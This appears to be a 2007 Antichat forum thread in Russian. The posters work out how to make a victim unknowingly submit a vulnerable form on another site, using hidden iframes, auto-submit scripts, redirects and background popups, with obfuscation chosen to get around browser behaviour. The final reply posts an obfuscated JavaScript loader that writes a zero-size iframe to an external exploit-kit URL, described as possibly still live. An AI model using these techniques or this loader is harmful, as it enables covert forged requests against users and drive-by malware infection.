Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Xss, скрытый от юзера сабмит формы |
24.05.2007, 13:49
|
|
Познающий
Регистрация: 21.05.2007
Сообщений: 61
Провел на форуме:
79888
Репутация:
145
|
|
Xss, скрытый от юзера сабмит формы
Есть сайт, на сайте форма. В форме нефильтруемые поля.
Задача: чтобы эту форму отправил другой человек, при этом ничего не заметив.
Варианты:
1) Делаем отвлекающую страницу с каким-нибудь текстом, который заинтересует жертву, в коде страницы iframe, в нем наша форма и <script>ourform.submit();</script>
Такой вариант работает в FF и Opera. Но только до тех пор, пока iframe не зашифрован. С зашифрованным iframe'ом в FF работать перестает. А желательно хотя-бы минимально зашифровать его (хотя бы String.fromCharCode)...
В ие вообще работать такой вариант отказывается.
2) Делаем страницу, при заходе на которую только в первый раз произойдет отправка формы. А к коду XSS дописываем редирект обратно на нашу страницу.
Работает во всех браузерах, но не слишком быстро, и юзер может заметить сменившийся адрес окна и подгружающийся любимый сайт.
Есть другие варианты? Желательно, хотя бы один пример незаметного и работающего в IE кода.
|
|
|
24.05.2007, 13:53
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
document.write('<iframe src='+String.fromCharCode()+'></iframe>');
|
|
|
|
24.05.2007, 14:31
|
|
Познающий
Регистрация: 21.05.2007
Сообщений: 61
Провел на форуме:
79888
Репутация:
145
|
|
Да, в FF с зашифрованным адресом пашет, а если весь iframe шифровать - то нет. Странно.
Но в IE по прежнему в iframe работать отказывается. Вернее, оно отсылается, но фрейм подгружает форму логина и пишет неизвестную ошибку.
Скорее всего тут дело не в том, что браузер что-то блокирует, а в какой-то защите на стороне атакуемого сайта.
Поэтому интересны другие методы, кроме загрузки страницы в iframe.
|
|
|
|
26.05.2007, 01:46
|
|
Познающий
Регистрация: 21.05.2007
Сообщений: 61
Провел на форуме:
79888
Репутация:
145
|
|
Даже простым
document.write(String.fromCharCode( --- full iframe code here --- ));
ничего не получалось. И простым unescape тоже. Но это по сути не важно, способ зашифровать линк от дурочка уже подсказали.
Судя по ответам, третьего, скрытого способа просто нет. Не очень и надеялся, конечно.
Хотя сейчас пришла в голову идея подключить ajax, он ведь может отсылась кастомные заголовки? Если да, то ответ загружать в скрытый <div> или просто не получать, если можно.
Кто в курсе ajax'a, можно ли POST запрос им отправить другому хосту ? |
|
|
|
26.05.2007, 12:31
|
|
Познающий
Регистрация: 21.05.2007
Сообщений: 61
Провел на форуме:
79888
Репутация:
145
|
|
К сожалению шифрование фрейма сейчас не самая приоритетная задача, потому-что сам факт фрейма не дает отправить форму в ИЕ. Но за способ все равно спасибо, на будущее запомню.
Я еше думаю по поводу попапа какого-нибудь, который бы был очень мелким по размерам, открылся бы на заднем плане, и сразу же закрылся, как только выполнил нужные действия, вроде так можно, только вот сложно открыть попап в ИЕ, блокируется он. Думаю попробывать сделать в нем сабмит.
|
|
|
|
26.05.2007, 14:38
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
Вот держи, не помню от какого-то загрузчика
PHP код:
<script language='JavaScript'><!--
function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060105102114097109101032115114099061039104116116112058047047098114098111100121046105110102111047109';
s=s+'112097099107047105110100101120046112104112039032119105100116104061048032104101105103104116061048032';
s=s+'102114097109101098111114100101114061039048039062060047105102114097109101062';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
//--></script>
Смотри не запускай у себя, вроде еще как бы это живая ссылка...)))
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Xss: Cегодня и вчера. Опрос
|
Constantine |
Болталка |
48 |
07.12.2009 08:57 |
|
Xss
|
bx_N |
Forum for discussion of ANTICHAT |
7 |
11.03.2007 19:17 |
|
Xss для новичков
|
Micr0b |
Уязвимости |
0 |
04.06.2006 18:25 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
